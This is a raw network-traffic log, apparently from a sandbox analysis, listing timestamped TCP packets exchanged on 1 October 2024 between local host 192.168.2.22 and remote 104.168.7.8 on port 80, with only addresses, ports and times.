                                                                                                                                Oct 1, 2024 09:25:30.282520056 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.282568932 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.282586098 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.282654047 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.282655954 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.282665014 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.282721043 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.283415079 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.283480883 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.283492088 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.283529043 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.283911943 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.283963919 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.283968925 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.283976078 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.284018040 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.284446955 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.284492970 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.284503937 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.284538031 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.284590960 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.284603119 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.284645081 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.285284042 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.285434008 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.285464048 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.285540104 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.285552979 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.285586119 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.285602093 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.285614014 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.285657883 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.286369085 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.286391020 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.286401987 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.286443949 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.286490917 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.286503077 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.286540031 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.287285089 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.287374020 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.287393093 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.287405968 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.287424088 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.287448883 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.287587881 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.287646055 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.287659883 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.287727118 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.287738085 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.287749052 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.287760973 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.287792921 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.288211107 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288259029 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288270950 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288290024 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.288301945 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.288317919 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288569927 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288711071 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288749933 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288760900 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288791895 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.288810015 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.288829088 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288840055 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288850069 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288903952 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288914919 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288927078 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.288932085 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.288944960 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.290271997 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290317059 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290328026 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.290328979 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290368080 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.290606976 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290617943 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290630102 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290641069 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290658951 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290671110 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290672064 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.290699005 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.290702105 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290712118 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290723085 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290734053 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290751934 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290759087 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.290766001 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290781975 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.290874958 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290920019 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291006088 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291016102 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291028023 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291038990 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291050911 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291062117 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291069984 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291090965 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291141033 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291152000 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291163921 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291176081 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291193962 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291218996 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291224957 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291235924 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291249037 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291260958 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291275024 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291320086 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291341066 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291485071 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291496038 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291507959 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291532040 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291799068 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291850090 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291853905 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291867971 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291938066 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291940928 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291955948 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291968107 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.292005062 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.292144060 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.292196035 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.292202950 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.292210102 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.292221069 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.292263031 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.307672977 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.307723045 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.307734013 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.307770967 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.355691910 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355706930 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355717897 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355751991 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.355869055 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355880976 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355892897 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355920076 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356009960 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356020927 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356031895 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356044054 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356070042 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356081009 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356082916 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356175900 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356187105 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356199026 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356209993 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356221914 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356226921 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356232882 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356247902 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356297970 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356425047 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356436014 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356481075 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356509924 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356520891 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356533051 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356545925 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356559992 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356590986 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356668949 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356777906 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356795073 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356806993 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356817961 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356826067 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356829882 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356841087 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356848955 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356857061 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356868982 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356880903 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356897116 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357156038 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357175112 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357219934 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357309103 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357320070 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357331991 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357342958 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357353926 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357364893 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357367039 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357383013 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357394934 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357395887 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357409000 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357435942 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357742071 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357754946 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357767105 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357779026 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357789993 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357804060 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357809067 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357816935 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357820988 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357832909 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357846975 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357851982 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357857943 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357870102 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357875109 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357882977 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357889891 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357901096 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357922077 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.358391047 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358402014 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358412981 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358424902 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358437061 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358438969 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.358447075 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358458042 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.358458996 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358469963 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358480930 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358510017 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.358822107 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358835936 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358846903 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358856916 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358864069 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.358869076 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358879089 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358884096 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.358891010 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358901978 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.358901978 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358920097 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.359311104 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359328985 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359338999 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359349966 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359360933 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359371901 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359375954 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.359381914 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359397888 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.359400034 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359406948 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.359411955 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359421968 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359435081 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359445095 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359452963 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.359456062 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359467983 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359474897 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.359478951 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359489918 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359491110 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.359503031 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359513998 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.359527111 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.359555006 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.361370087 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361382008 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361393929 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361406088 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361418009 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361428022 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361439943 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361438990 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.361439943 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.361452103 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361463070 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361468077 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.361474037 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361490965 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.361509085 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.361741066 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361799955 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361812115 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361831903 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.361845970 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.396159887 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.396193981 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.396203041 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.396222115 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.396249056 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.396250963 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.396260977 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.396271944 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.396284103 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.396305084 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.396328926 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.396383047 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.444165945 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.444192886 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.444225073 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.444240093 CEST8049171104.168.7.8192.168.2.22
